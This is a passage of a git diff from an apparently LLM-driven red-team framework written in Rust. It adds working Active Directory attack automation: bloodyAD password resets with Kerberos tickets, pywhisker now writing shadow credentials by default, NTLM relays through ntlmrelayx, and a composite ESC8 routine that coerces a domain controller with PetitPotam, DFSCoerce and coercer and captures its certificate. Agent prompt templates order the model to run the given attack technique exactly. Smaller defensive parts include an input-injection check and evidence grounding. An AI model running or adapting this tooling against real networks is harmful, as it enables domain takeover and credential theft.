credential_domain }}{% if credential_password %} / Password: {{ credential_password }}{% endif %} +{% if credential_username %}**Principal:** {{ credential_username }}@{{ credential_domain }} (auth: {{ credential_auth_type }} — auto-resolved at dispatch, do NOT pass password/hash/ticket fields) {% endif -%} Move laterally to the target using {{ technique }}. diff --git a/ares-llm/templates/redteam/tasks/privesc_enumeration.md.tera b/ares-llm/templates/redteam/tasks/privesc_enumeration.md.tera index f2bd1633..0e980929 100644 --- a/ares-llm/templates/redteam/tasks/privesc_enumeration.md.tera +++ b/ares-llm/templates/redteam/tasks/privesc_enumeration.md.tera @@ -4,7 +4,7 @@ **Target:** {{ target_ip }} {% if domain %}**Domain:** {{ domain }} {% endif -%} -{% if credential_username %}**Credential:** {{ credential_username }}@{{ credential_domain }}{% if credential_password %} / Password: {{ credential_password }}{% endif %} +{% if credential_username %}**Principal:** {{ credential_username }}@{{ credential_domain }} (auth: {{ credential_auth_type }} — auto-resolved at dispatch, do NOT pass password/hash/ticket fields) {% endif -%} Enumerate privilege escalation opportunities using {{ technique }}. diff --git a/ares-llm/templates/redteam/tasks/recon.md.tera b/ares-llm/templates/redteam/tasks/recon.md.tera index c3f7d589..625a96e9 100644 --- a/ares-llm/templates/redteam/tasks/recon.md.tera +++ b/ares-llm/templates/redteam/tasks/recon.md.tera @@ -3,15 +3,31 @@ **Target:** {{ target_ip }} {% if domain %}**Domain:** {{ domain }} {% endif -%} -{% if credential_username %}**Credential:** {{ credential_username }}@{{ credential_domain }}{% if credential_password %} / Password: {{ credential_password }}{% endif %} +{% if credential_username %}**Principal:** {{ credential_username }}@{{ credential_domain }} (auth: {{ credential_auth_type }} — auto-resolved at dispatch, do NOT pass password/hash/ticket fields) +{% endif -%} +{% if bind_domain %}**Bind Domain:** {{ bind_domain }} (use bind_domain={{ bind_domain }} in ldap_search when credential domain differs from target domain) {% endif -%} +{% if technique -%} +**Technique:** {{ technique }} +{% endif -%} {% if techniques -%} **Requested Techniques:** {% for t in techniques -%} - {{ t }} {% endfor -%} -{% else -%} +{% endif -%} +{% if has_ntlm_hash -%} +**NTLM Hash available** (auto-resolved at dispatch — do NOT pass `nthash`/`hashes` fields){% if hash_username %} for user: {{ hash_username }}{% endif %} +{% endif -%} + +{% if instructions -%} +## Instructions + +**IMPORTANT: Follow these instructions exactly. Do NOT perform generic scanning — execute only the specific technique described below.** + +{{ instructions }} +{% elif not techniques -%} Perform a comprehensive reconnaissance scan of the target. {% endif -%} diff --git a/ares-tools/Cargo.toml b/ares-tools/Cargo.toml index b519596b..9ecbbeff 100644 --- a/ares-tools/Cargo.toml +++ b/ares-tools/Cargo.toml @@ -17,6 +17,7 @@ uuid = { workspace = true } regex = { workspace = true } redis = { workspace = true } tempfile = "3" +base64 = "0.22" [features] default = ["blue"] diff --git a/ares-tools/src/acl.rs b/ares-tools/src/acl.rs index 48c239cd..3ba75f07 100644 --- a/ares-tools/src/acl.rs +++ b/ares-tools/src/acl.rs @@ -50,26 +50,52 @@ pub async fn bloodyad_add_group_member(args: &Value) -> Result { /// Set a user's password via `bloodyAD set password`. /// -/// Required args: `domain`, `username`, `password`, `dc_ip`, `target_user`, `new_password` +/// Required args: `domain`, `dc_ip`, `target_user`, `new_password` +/// Auth — one of: +/// - `username` + `password` (plaintext NTLM bind) +/// - `ticket_path` (Kerberos ccache path; bloodyAD `-k -K `) +/// +/// When `ticket_path` is provided it takes precedence over password/hash. +/// The env var `KRB5CCNAME` is set to the path so bloodyad's Kerberos stack +/// picks it up without a separate `kinit` step. pub async fn bloodyad_set_password(args: &Value) -> Result { let domain = required_str(args, "domain")?; - let username = required_str(args, "username")?; - let password = required_str(args, "password")?; let dc_ip = required_str(args, "dc_ip")?; let target_user = required_str(args, "target_user")?; let new_password = required_str(args, "new_password")?; - - let creds = credentials::bloodyad_creds(domain, username, password, dc_ip); - - CommandBuilder::new("bloodyAD") - .args(creds) - .arg("set") - .arg("password") - .arg(target_user) - .arg(new_password) - .timeout_secs(60) - .execute() - .await + let ticket_path = optional_str(args, "ticket_path").filter(|s| !s.is_empty()); + + if let Some(tpath) = ticket_path { + // Kerberos mode: bloodyAD -d --host -k -K + CommandBuilder::new("bloodyAD") + .flag("-d", domain) + .flag("--host", dc_ip) + .arg("-k") + .flag("-K", tpath.to_string()) + .arg("set") + .arg("password") + .arg(target_user) + .arg(new_password) + // KRB5CCNAME must also be set as an env var; some bloodyAD + // versions read it even when -K is passed. + .env("KRB5CCNAME", tpath) + .timeout_secs(60) + .execute() + .await + } else { + let username = required_str(args, "username")?; + let password = required_str(args, "password")?; + let creds = credentials::bloodyad_creds(domain, username, password, dc_ip); + CommandBuilder::new("bloodyAD") + .args(creds) + .arg("set") + .arg("password") + .arg(target_user) + .arg(new_password) + .timeout_secs(60) + .execute() + .await + } } /// Grant GenericAll rights via `bloodyAD add genericAll`. @@ -152,14 +178,14 @@ pub async fn gmsa_read_password_bloodyad(args: &Value) -> Result { /// Manipulate msDS-KeyCredentialLink via `pywhisker.py`. /// /// Required args: `domain`, `username`, `password`, `dc_ip`, `target_samaccountname` -/// Optional args: `action` (default: `"list"`) +/// Optional args: `action` (default: `"add"`) pub async fn pywhisker(args: &Value) -> Result { let domain = required_str(args, "domain")?; let username = required_str(args, "username")?; let password = required_str(args, "password")?; let dc_ip = required_str(args, "dc_ip")?; let target_sam = required_str(args, "target_samaccountname")?; - let action = optional_str(args, "action").unwrap_or("list"); + let action = optional_str(args, "action").unwrap_or("add"); CommandBuilder::new("pywhisker") .flag("-d", domain) @@ -167,7 +193,7 @@ pub async fn pywhisker(args: &Value) -> Result { .flag("-p", password) .flag("--target", target_sam) .flag("--action", action) - .flag("-dc-ip", dc_ip) + .flag("--dc-ip", dc_ip) .timeout_secs(120) .execute() .await @@ -267,7 +293,7 @@ pub async fn dacl_edit(args: &Value) -> Result { let target_dn = required_str(args, "target_dn")?; let action = optional_str(args, "action").unwrap_or("write"); - let target = credentials::impacket_target(Some(domain), username, Some(password), domain); + let target = credentials::impacket_target(Some(domain), username, Some(password), dc_ip); CommandBuilder::new("dacledit.py") .flag("-action", action) @@ -503,8 +529,8 @@ mod tests { "dc_ip": "192.168.58.10", "target_samaccountname": "dc01$" }); - let action = optional_str(&args, "action").unwrap_or("list"); - assert_eq!(action, "list"); + let action = optional_str(&args, "action").unwrap_or("add"); + assert_eq!(action, "add"); } #[test] @@ -515,10 +541,10 @@ mod tests { "password": "P@ssw0rd!", "dc_ip": "192.168.58.10", "target_samaccountname": "dc01$", - "action": "add" + "action": "list" }); - let action = optional_str(&args, "action").unwrap_or("list"); - assert_eq!(action, "add"); + let action = optional_str(&args, "action").unwrap_or("add"); + assert_eq!(action, "list"); } #[test] @@ -837,6 +863,8 @@ mod tests { assert_eq!(action_flag, "--AddComputerTask"); } + // --- mock executor tests: exercise full CommandBuilder code paths --- + use crate::executor::mock; #[tokio::test] @@ -859,6 +887,35 @@ mod tests { assert!(super::bloodyad_set_password(&args).await.is_ok()); } + #[tokio::test] + async fn bloodyad_set_password_kerberos_mode_executes() { + // When ticket_path is supplied, bloodyAD should be invoked with -k -K + // rather than username/password. This verifies the Kerberos branch of + // bloodyad_set_password builds a valid command without erroring out. + mock::push(mock::success()); + let args = json!({ + "domain": "fabrikam.local", + "dc_ip": "192.168.58.20", + "target_user": "svc_exploit", + "new_password": "NewP@ss!99", + "ticket_path": "/tmp/ares-tickets/contoso_local__fabrikam_local__Administrator.ccache" + }); + assert!(super::bloodyad_set_password(&args).await.is_ok()); + } + + #[tokio::test] + async fn bloodyad_set_password_kerberos_missing_creds_still_needs_new_password() { + // ticket_path branch still requires new_password. + let args = json!({ + "domain": "fabrikam.local", + "dc_ip": "192.168.58.20", + "target_user": "svc_exploit", + "ticket_path": "/tmp/ares-tickets/contoso_local__fabrikam_local__Administrator.ccache" + // new_password deliberately absent + }); + assert!(required_str(&args, "new_password").is_err()); + } + #[tokio::test] async fn bloodyad_add_genericall_executes() { mock::push(mock::success()); diff --git a/ares-tools/src/blue/investigation/write.rs b/ares-tools/src/blue/investigation/write.rs index 7b065f49..35557f66 100644 --- a/ares-tools/src/blue/investigation/write.rs +++ b/ares-tools/src/blue/investigation/write.rs @@ -36,13 +36,24 @@ pub async fn add_evidence(args: &Value) -> Result { ))); } - // Validate evidence against recent query results and adjust confidence - let (query_validated, _source_query_id) = evidence_validator::validate_evidence_value(value); + // Grounding: refuse to write evidence whose value was not seen in any + // recent query result (or is a MITRE technique ID, which auto-validates). + // Without this check, an agent could fabricate an IP/user/hash and have it + // accepted as evidence — confidence-only penalties don't deter that. + let (query_validated, source_query_id) = evidence_validator::validate_evidence_value(value); + if !query_validated { + return Ok(make_error(&format!( + "Evidence rejected: value '{value}' was not found in any recorded query result. \ + Run a Loki/Prometheus query that returns this value first, then add it as evidence. \ + Evidence values must be IOCs grounded in observed data, not asserted by the agent." + ))); + } let raw_confidence = args .get("confidence") .and_then(Value::as_f64) .unwrap_or(0.5); let confidence = evidence_validator::adjust_confidence(raw_confidence, query_validated); + let _ = source_query_id; // Auto-assign pyramid level from evidence type when caller omits it let pyramid_level = optional_str(args, "pyramid_level") @@ -198,7 +209,17 @@ pub async fn add_evidence_batch(args: &Value) -> Result { continue; } + // Grounding: reject items whose value was not seen in any recent + // query result (MITRE technique IDs auto-validate inside + // `validate_evidence_value`). let (query_validated, _) = evidence_validator::validate_evidence_value(value); + if !query_validated { + validation_errors.push(format!( + "item[{i}] {evidence_type}={value}: value not found in any recorded query result \ + (run a query returning this IOC before recording it as evidence)" + )); + continue; + } let raw_confidence = item .get("confidence") .and_then(Value::as_f64) diff --git a/ares-tools/src/coercion.rs b/ares-tools/src/coercion.rs index 1e1e7901..20deddec 100644 --- a/ares-tools/src/coercion.rs +++ b/ares-tools/src/coercion.rs @@ -4,9 +4,16 @@ //! produced by running the corresponding CLI tool as a subprocess. use std::io::Write; +use std::net::TcpListener; +use std::path::{Path, PathBuf}; +use std::process::Stdio; +use std::time::{Duration, Instant}; -use anyhow::Result; +use anyhow::{Context, Result}; +use base64::Engine; use serde_json::Value; +use tokio::process::{Child, Command as TokioCommand}; +use tokio::time::sleep; use crate::args::{optional_bool, optional_str, required_str}; use crate::executor::CommandBuilder; @@ -58,6 +65,7 @@ pub async fn coercer(args: &Value) -> Result { .arg("coerce") .flag("-t", target) .flag("-l", listener) + .arg("--always-continue") .timeout_secs(120); if let Some(u) = username { @@ -89,6 +97,7 @@ pub async fn petitpotam(args: &Value) -> Result { .flag("-t", target) .flag("-l", listener) .args(["--filter-protocol-name", "MS-EFSR"]) + .arg("--always-continue") .timeout_secs(60); if let Some(u) = username { @@ -116,8 +125,8 @@ pub async fn dfscoerce(args: &Value) -> Result { let domain = optional_str(args, "domain"); let mut cmd = CommandBuilder::new("dfscoerce") - .flag("-t", target) - .flag("-l", listener) + .arg(listener) + .arg(target) .timeout_secs(60); if let Some(u) = username { @@ -133,6 +142,25 @@ pub async fn dfscoerce(args: &Value) -> Result { cmd.execute().await } +/// Standalone-relay BUSY response. Standalone `ntlmrelayx_to_*` tools share +/// the host-wide port 445 (and SOCKS 1080) with `relay_and_coerce`; a second +/// invocation while one is already in flight crashes with +/// `OSError [Errno 98] Address already in use`. We acquire the same loopback +/// sentinel the composite path uses and refuse to race when contended. +fn relay_busy_output(tool: &str) -> ToolOutput { + ToolOutput { + stdout: format!( + "RELAY_BIND_BUSY\n{tool}: another relay/coerce invocation is active \ + on this host (loopback port {RELAY_LOCK_PORT} held). Refusing to \ + race for ntlmrelayx port 445; retry after the in-flight relay \ + completes." + ), + stderr: String::new(), + exit_code: Some(0), + success: false, + } +} + /// Relay captured NTLM authentication to LDAPS for delegation abuse. /// /// Required args: `dc_ip` @@ -141,6 +169,11 @@ pub async fn ntlmrelayx_to_ldaps(args: &Value) -> Result { let dc_ip = required_str(args, "dc_ip")?; let delegate_access = optional_bool(args, "delegate_access").unwrap_or(false); + let _lock = match try_acquire_relay_lock() { + Some(l) => l, + None => return Ok(relay_busy_output("ntlmrelayx_to_ldaps")), + }; + let target_url = format!("ldaps://{dc_ip}"); CommandBuilder::new("impacket-ntlmrelayx") @@ -159,6 +192,11 @@ pub async fn ntlmrelayx_to_adcs(args: &Value) -> Result { let ca_host = required_str(args, "ca_host")?; let template = optional_str(args, "template"); + let _lock = match try_acquire_relay_lock() { + Some(l) => l, + None => return Ok(relay_busy_output("ntlmrelayx_to_adcs")), + }; + let target_url = format!("http://{ca_host}/certsrv/certfnsh.asp"); CommandBuilder::new("impacket-ntlmrelayx") @@ -179,15 +217,850 @@ pub async fn ntlmrelayx_to_smb(args: &Value) -> Result { let socks = optional_bool(args, "socks").unwrap_or(false); let interactive = optional_bool(args, "interactive").unwrap_or(false); + let _lock = match try_acquire_relay_lock() { + Some(l) => l, + None => return Ok(relay_busy_output("ntlmrelayx_to_smb")), + }; + CommandBuilder::new("impacket-ntlmrelayx") .flag("-t", target_ip) - .arg_if(socks, "--socks") + .arg_if(socks, "-socks") .arg_if(interactive, "-i") .timeout_secs(120) .execute() .await } +/// Parsed + validated args for [`relay_and_coerce`]. Pulled into a struct so +/// the validation logic can be unit-tested without spawning subprocesses. +#[derive(Debug, Clone, PartialEq, Eq)] +struct RelayCoerceConfig { + ca_host: String, + coerce_target: String, + attacker_ip: String, + coerce_user: Option, + coerce_domain: String, + coerce_secret: Option, + template: String, +} + +#[derive(Debug, Clone, PartialEq, Eq)] +enum CoerceSecret { + Hash(String), + Password(String), +} + +fn parse_relay_coerce_args(args: &Value) -> Result { + let ca_host = required_str(args, "ca_host")?; + // Accept legacy `target_dc` as an alias for backwards compat with state + // injected before the rename. + let coerce_target = optional_str(args, "coerce_target") + .or_else(|| optional_str(args, "target_dc")) + .ok_or_else(|| { + anyhow::anyhow!("relay_and_coerce: missing required argument 'coerce_target'") + })?; + let attacker_ip = required_str(args, "attacker_ip")?; + let coerce_user = optional_str(args, "coerce_user").filter(|s| !s.is_empty()); + let coerce_domain = optional_str(args, "coerce_domain").unwrap_or(""); + let coerce_hash = optional_str(args, "coerce_hash").filter(|s| !s.is_empty()); + let coerce_password = optional_str(args, "coerce_password").filter(|s| !s.is_empty()); + let template = optional_str(args, "template").unwrap_or("DomainController"); + + // Source ≠ target. Coercing the CA host itself triggers same-machine + // NTLM loopback rejection at IIS. Conservative literal compare — callers + // mixing hostname/IP across the two args still slip through, that's their + // problem to keep distinct. + if coerce_target == ca_host { + anyhow::bail!( + "relay_and_coerce: coerce_target ({coerce_target}) must differ from ca_host \ + ({ca_host}); same-machine NTLM loopback protection blocks relayed auth. \ + Coerce a different machine account (e.g. another DC) and relay it to this CA." + ); + } + + if coerce_user.is_some() && coerce_hash.is_none() && coerce_password.is_none() { + anyhow::bail!( + "relay_and_coerce: coerce_user provided without coerce_hash or coerce_password" + ); + } + + // Defensive newline check so a stray input can't smuggle a second arg + // into a child process via env propagation. Single-quote no longer matters + // (no shell), but keep newline reject — embedded newlines in a hash or + // hostname are always wrong. + for (name, val) in [ + ("ca_host", ca_host), + ("coerce_target", coerce_target), + ("attacker_ip", attacker_ip), + ("coerce_user", coerce_user.unwrap_or("")), + ("coerce_domain", coerce_domain), + ("template", template), + ] { + if val.contains('\n') || val.contains('\'') { + anyhow::bail!("{name} contains forbidden character (newline or single-quote)"); + } + } + + let coerce_secret = if let Some(h) = coerce_hash { + if h.contains('\n') || h.contains('\'') || h.contains(' ') { + anyhow::bail!("coerce_hash contains forbidden character"); + } + Some(CoerceSecret::Hash(h.to_string())) + } else if let Some(p) = coerce_password { + if p.contains('\n') || p.contains('\'') { + anyhow::bail!("coerce_password contains forbidden character"); + } + Some(CoerceSecret::Password(p.to_string())) + } else { + None + }; + + Ok(RelayCoerceConfig { + ca_host: ca_host.to_string(), + coerce_target: coerce_target.to_string(), + attacker_ip: attacker_ip.to_string(), + coerce_user: coerce_user.map(String::from), + coerce_domain: coerce_domain.to_string(), + coerce_secret, + template: template.to_string(), + }) +} + +// === Trait-based execution seam ===================================== +// +// The phase-progression logic (spawn relay → run coerce phases → poll +// log → extract cert) is exercised by unit tests via FakeCoerceProcs, +// which scripts subprocess outcomes and relay-log writes. Production +// uses RealCoerceProcs which wraps tokio::process::{Command,Child}. + +trait RelayHandle { + fn pid(&self) -> u32; + /// Sleep `settle` (giving the process time to bind ports), then check + /// whether it has already exited. Returns the exit code if so. + async fn settle_then_try_wait(&mut self, settle: Duration) -> Option; + async fn kill_and_wait(&mut self, timeout: Duration); +} + +trait CoerceProcs { + type Handle: RelayHandle; + fn is_local_ip(&self, ip: &str) -> bool; + fn list_local_ips(&self) -> Vec; + fn which_binary(&self, name: &str) -> bool; + async fn cleanup_stale_listeners(&self, workdir: &Path); + async fn spawn_relay( + &self, + target_url: &str, + template: &str, + relay_log: &Path, + workdir: &Path, + ) -> Result; + async fn run_phase( + &self, + coerce_log: &Path, + header: &str, + bin: &str, + args: &[&str], + cwd: &Path, + timeout_secs: u64, + ); +} + +#[derive(Debug, Clone, Copy)] +struct RunOptions { + relay_settle: Duration, + poll_interval: Duration, + poll_phase_1: Duration, + poll_phase_2: Duration, + poll_phase_3: Duration, + post_capture_settle: Duration, + relay_kill_timeout: Duration, + keep_workdir_on_capture: bool, + /// Whether to acquire the host-wide TCP-port mutex before spawning the + /// relay. Production sets this to `true` to serialize concurrent + /// invocations across worker processes; unit tests set `false` so they + /// can run in parallel without fighting over the loopback sentinel port. + acquire_host_lock: bool, +} + +impl RunOptions { + fn production() -> Self { + Self { + relay_settle: Duration::from_secs(3), + poll_interval: Duration::from_millis(500), + poll_phase_1: Duration::from_secs(8), + poll_phase_2: Duration::from_secs(10), + poll_phase_3: Duration::from_secs(8), + post_capture_settle: Duration::from_secs(5), + relay_kill_timeout: Duration::from_secs(5), + keep_workdir_on_capture: true, + acquire_host_lock: true, + } + } +} + +// --- Real (production) implementation ------------------------------- + +struct RealCoerceProcs; + +struct RealRelayHandle { + child: Child, +} + +impl RelayHandle for RealRelayHandle { + fn pid(&self) -> u32 { + self.child.id().unwrap_or(0) + } + + async fn settle_then_try_wait(&mut self, settle: Duration) -> Option { + sleep(settle).await; + match self.child.try_wait() { + Ok(Some(status)) => Some(status.code().unwrap_or(-1)), + _ => None, + } + } + + async fn kill_and_wait(&mut self, timeout: Duration) { + let _ = self.child.start_kill(); + let _ = tokio::time::timeout(timeout, self.child.wait()).await; + } +} + +impl CoerceProcs for RealCoerceProcs { + type Handle = RealRelayHandle; + + fn is_local_ip(&self, ip: &str) -> bool { + use std::net::{IpAddr, UdpSocket}; + let parsed: IpAddr = match ip.parse() { + Ok(addr) => addr, + Err(_) => return false, + }; + if parsed.is_loopback() || parsed.is_unspecified() || parsed.is_multicast() { + return false; + } + UdpSocket::bind((parsed, 0)).is_ok() + } + + fn list_local_ips(&self) -> Vec { + use std::net::UdpSocket; + let mut out = Vec::new(); + if let Ok(sock) = UdpSocket::bind("0.0.0.0:0") { + if sock.connect("8.8.8.8:53").is_ok() { + if let Ok(local) = sock.local_addr() { + let ip = local.ip().to_string(); + if !ip.starts_with("127.") { + out.push(ip); + } + } + } + } + out + } + + fn which_binary(&self, name: &str) -> bool { + let Some(path) = std::env::var_os("PATH") else { + return false; + }; + for dir in std::env::split_paths(&path) { + if dir.join(name).is_file() { + return true; + } + } + false + } + + async fn cleanup_stale_listeners(&self, workdir: &Path) { + // pkill returns 1 if no match — fine; we want at-most-once semantics, + // not strict success. ntlmrelayx surfaces RELAY_BIND_FAILED later if a + // non-impacket process is still holding the ports. + for pat in [ + "impacket-ntlmrelayx", + "ntlmrelayx.py", + "Responder.py", + "impacket-petitpotam", + ] { + let _ = TokioCommand::new("pkill") + .arg("-f") + .arg(pat) + .stdin(Stdio::null()) + .stdout(Stdio::null()) + .stderr(Stdio::null()) + .current_dir(workdir) + .status() + .await; + } + sleep(Duration::from_millis(500)).await; + } + + async fn spawn_relay( + &self, + target_url: &str, + template: &str, + relay_log: &Path, + workdir: &Path, + ) -> Result { + let relay_log_out = std::fs::File::create(relay_log).context("create relay.log")?; + let relay_log_err = relay_log_out.try_clone().context("dup relay.log fd")?; + // ntlmrelayx writes captured PFXs (and BloodHound JSON) relative to its + // own CWD. Pin it to the workdir so artifacts land where we can find + // them (and not in the worker's `/`). --keep-relaying prevents the + // first inbound (often anonymous) connection from causing "All targets + // processed!" before the real coerced DC calls back. + let child = TokioCommand::new("impacket-ntlmrelayx") + .arg("-t") + .arg(target_url) + .arg("--adcs") + .arg("--template") + .arg(template) + .arg("-smb2support") + .arg("--keep-relaying") + .arg("--no-da") + .arg("--no-acl") + .arg("--no-validate-privs") + .arg("--no-dump") + .current_dir(workdir) + .stdin(Stdio::piped()) + .stdout(Stdio::from(relay_log_out)) + .stderr(Stdio::from(relay_log_err)) + .kill_on_drop(true) + .spawn() + .context("failed to spawn impacket-ntlmrelayx (is it installed?)")?; + Ok(RealRelayHandle { child }) + } + + async fn run_phase( + &self, + coerce_log: &Path, + header: &str, + bin: &str, + args: &[&str], + cwd: &Path, + timeout_secs: u64, + ) { + let mut cmd = TokioCommand::new(bin); + for a in args { + cmd.arg(a); + } + cmd.current_dir(cwd).stdin(Stdio::null()); + let timeout = Duration::from_secs(timeout_secs); + match tokio::time::timeout(timeout, cmd.output()).await { + Ok(Ok(out)) => append_output(coerce_log, header, &out).await, + Ok(Err(e)) => append_error(coerce_log, header, &format!("spawn failed: {e}")).await, + Err(_) => { + append_error( + coerce_log, + header, + &format!("timed out after {timeout_secs}s"), + ) + .await + } + } + } +} + +/// Composite ESC8 relay+coerce. Starts ntlmrelayx targeting AD CS web +/// enrollment, coerces a chosen machine account over unauth PetitPotam → +/// authenticated DFSCoerce → MS-EFSR → MS-RPRN until the relay log shows a +/// cert capture, then decodes the base64 cert from the log and emits +/// deterministic `PFX_FILE=` / `RELAYED_USER=` markers for the parser. +/// +/// Required args: `ca_host`, `coerce_target`, `attacker_ip`. +/// Optional args: `coerce_user`, `coerce_domain`, `coerce_hash` / +/// `coerce_password`, `template` (default "DomainController"). +/// +/// **Source ≠ target.** `coerce_target` MUST differ from `ca_host`. When CA +/// is co-located on the DC (common in lab AD), coercing the same host triggers +/// Microsoft's same-machine NTLM loopback protection and ADCS rejects the +/// relayed auth. Coerce a different DC or member instead — e.g. a child-DC +/// machine account relayed to the parent forest's CA. +/// +/// Phase 1 always runs unauthenticated PetitPotam (works against unpatched +/// DCs without creds). Phase 2 runs authenticated DFSCoerce. Phase 3 runs +/// `coercer` for MS-EFSR / MS-RPRN. Phases 2/3 are skipped when no creds +/// are supplied. +pub async fn relay_and_coerce(args: &Value) -> Result { + let cfg = parse_relay_coerce_args(args)?; + run_relay_and_coerce(cfg, &RealCoerceProcs, RunOptions::production()).await +} + +/// Host-wide TCP-port mutex. ntlmrelayx binds 0.0.0.0:445 (and 80) globally; +/// two relay invocations racing on the same host produce +/// `OSError [Errno 98] Address already in use` and the loser silently fails +/// to relay anything. The orchestrator dispatches `relay_and_coerce` from +/// multiple workers (separate processes), so an intra-process Mutex is not +/// enough — we need cross-process serialization. +/// +/// Trick: bind a TCP listener to a fixed loopback port (41445). The kernel +/// guarantees only one process can hold the port at a time, and releases it +/// automatically when the listener is dropped or the process dies. No file +/// cleanup required, no stale-lock races. Hold the returned listener for the +/// lifetime of the relay; drop it (implicitly) to release. +const RELAY_LOCK_PORT: u16 = 41445; + +#[cfg(test)] +thread_local! { + /// When set on a test thread, [`try_acquire_relay_lock`] uses the real + /// host-wide port instead of bypassing it. The contention test sets this + /// so its assertion that a held port returns `None` still works; all other + /// tests leave it false so they don't fight over the single port. + static USE_REAL_RELAY_LOCK_IN_TEST: std::cell::Cell = + const { std::cell::Cell::new(false) }; +} + +fn try_acquire_relay_lock() -> Option { + #[cfg(test)] + { + // Default test behavior: bind to an ephemeral loopback port so tests + // never contend on the single host-wide sentinel. Tests that need to + // exercise contention semantics opt in via USE_REAL_RELAY_LOCK_IN_TEST. + if !USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.get()) { + return TcpListener::bind("127.0.0.1:0").ok(); + } + } + use std::net::SocketAddr; + let addr: SocketAddr = ([127, 0, 0, 1], RELAY_LOCK_PORT).into(); + TcpListener::bind(addr).ok() +} + +async fn run_relay_and_coerce( + cfg: RelayCoerceConfig, + procs: &P, + opts: RunOptions, +) -> Result { + // attacker_ip MUST be one of our local interface IPs. The LLM has been + // observed to misread context and pass a *target* host (e.g. DC01) + // as the attacker IP, which makes the relay listener bind to 0.0.0.0 but + // PetitPotam tells the coerced DC to authenticate back to the wrong host + // — auth never reaches the relay. Fail fast with a clear error. + if !procs.is_local_ip(&cfg.attacker_ip) { + anyhow::bail!( + "relay_and_coerce: attacker_ip ({}) is not a local interface IP. \ + Pass the listener_ip / attacker_ip exactly as supplied by the \ + orchestrator payload — this MUST be the attacker host's IP \ + (where the relay listener binds), NOT a target machine. \ + Available local IPs: {}", + cfg.attacker_ip, + procs.list_local_ips().join(", "), + ); + } + + // Acquire the host-wide relay lock BEFORE any teardown of stale listeners. + // If another relay_and_coerce invocation is in flight on this host, refuse + // immediately with RELAY_BIND_BUSY rather than racing it for port 445 and + // both losing — the dispatcher's dedup will retry on the next tick. + // + // Must come before `cleanup_stale_listeners`; otherwise we'd pkill the + // in-flight peer's ntlmrelayx and corrupt its capture mid-flight. + // + // The listener is held in `_relay_lock` so the kernel keeps the port bound + // for the whole function body. Drop on return automatically releases it. + let _relay_lock = if opts.acquire_host_lock { + match try_acquire_relay_lock() { + Some(l) => Some(l), + None => { + return Ok(ToolOutput { + stdout: format!( + "RELAY_BIND_BUSY\nAnother relay_and_coerce is active on this \ + host (loopback port {RELAY_LOCK_PORT} held). Refusing to race \ + for ntlmrelayx port 445; retry after the in-flight relay \ + completes." + ), + stderr: String::new(), + exit_code: Some(0), + success: false, + }); + } + } + } else { + None + }; + + let tempdir = tempfile::Builder::new() + .prefix("ares_relay_") + .tempdir() + .context("failed to create relay workdir")?; + let workdir = tempdir.path().to_path_buf(); + let relay_log = workdir.join("relay.log"); + let coerce_log = workdir.join("coerce.log"); + + procs.cleanup_stale_listeners(&workdir).await; + + let target_url = format!("http://{}/certsrv/certfnsh.asp", cfg.ca_host); + let mut relay = procs + .spawn_relay(&target_url, &cfg.template, &relay_log, &workdir) + .await?; + + // Give it a moment to bind ports; if it died, surface RELAY_BIND_FAILED. + if let Some(code) = relay.settle_then_try_wait(opts.relay_settle).await { + let log = tokio::fs::read_to_string(&relay_log) + .await + .unwrap_or_default(); + return Ok(ToolOutput { + stdout: format!("RELAY_BIND_FAILED\n{log}"), + stderr: String::new(), + exit_code: Some(code), + success: false, + }); + } + + let mut summary = format!("RELAY_PID={}\n", relay.pid()); + let mut captured_via: Option<&'static str> = None; + + // --- Phase 1: unauthenticated PetitPotam --- + // Distros differ: Kali ships `petitpotam` (symlink), pip ships + // `impacket-petitpotam`. Try in order, log if both missing. + summary.push_str("=== Phase 1: unauth PetitPotam ===\n"); + let petit_bin = ["petitpotam", "impacket-petitpotam"] + .into_iter() + .find(|b| procs.which_binary(b)) + .unwrap_or("petitpotam"); + // PetitPotam positional args are `target path` (where `target` is the + // machine being coerced and `path` is the UNC the target authenticates + // back to). Reversing them coerces the attacker host onto itself. + let unc_path = format!("\\\\{}\\share\\x", cfg.attacker_ip); + let p1_args: [&str; 2] = [cfg.coerce_target.as_str(), unc_path.as_str()]; + procs + .run_phase( + &coerce_log, + "Phase 1: unauth PetitPotam", + petit_bin, + &p1_args, + &workdir, + 25, + ) + .await; + if poll_for_cert(&relay_log, opts.poll_phase_1, opts.poll_interval).await { + captured_via = Some("unauth_petitpotam"); + } + + // --- Phase 2: authenticated DFSCoerce --- + if captured_via.is_none() && cfg.coerce_user.is_some() { + summary.push_str("=== Phase 2: authenticated DFSCoerce (MS-DFSNM) ===\n"); + let user = cfg.coerce_user.as_deref().unwrap(); + let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref()); + let mut a: Vec<&str> = vec!["-u", user, "-d", cfg.coerce_domain.as_str()]; + for s in &secret_args { + a.push(s.as_str()); + } + a.push(cfg.attacker_ip.as_str()); + a.push(cfg.coerce_target.as_str()); + procs + .run_phase( + &coerce_log, + "Phase 2: DFSCoerce", + "dfscoerce", + &a, + &workdir, + 25, + ) + .await; + if poll_for_cert(&relay_log, opts.poll_phase_2, opts.poll_interval).await { + captured_via = Some("MS-DFSNM"); + } + } + + // --- Phase 3: coercer over MS-EFSR / MS-RPRN --- + if captured_via.is_none() && cfg.coerce_user.is_some() { + let user = cfg.coerce_user.as_deref().unwrap(); + let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref()); + for proto in ["MS-EFSR", "MS-RPRN"] { + summary.push_str(&format!( + "=== Phase 3: authenticated coerce via {proto} ===\n" + )); + let mut a: Vec<&str> = vec![ + "coerce", + "-u", + user, + "-d", + cfg.coerce_domain.as_str(), + "-t", + cfg.coerce_target.as_str(), + "-l", + cfg.attacker_ip.as_str(), + "--filter-protocol-name", + proto, + "--auth-type", + "smb", + "--always-continue", + ]; + for s in &secret_args { + a.push(s.as_str()); + } + procs + .run_phase( + &coerce_log, + &format!("Phase 3: {proto}"), + "coercer", + &a, + &workdir, + 25, + ) + .await; + if poll_for_cert(&relay_log, opts.poll_phase_3, opts.poll_interval).await { + captured_via = Some(proto); + break; + } + } + } + + // Allow any in-flight ADCS request to finish writing the cert. + if captured_via.is_some() { + sleep(opts.post_capture_settle).await; + } + + relay.kill_and_wait(opts.relay_kill_timeout).await; + + // Extract cert from the relay log if captured. Two ntlmrelayx output + // shapes need handling: + // 1. `--adcs` (our path) — writes the PFX to disk and logs + // "Writing PKCS#12 certificate to ./.pfx" + earlier + // "Authenticating connection from .../$@ip" lines. + // 2. `--ldap` userCertificate — logs 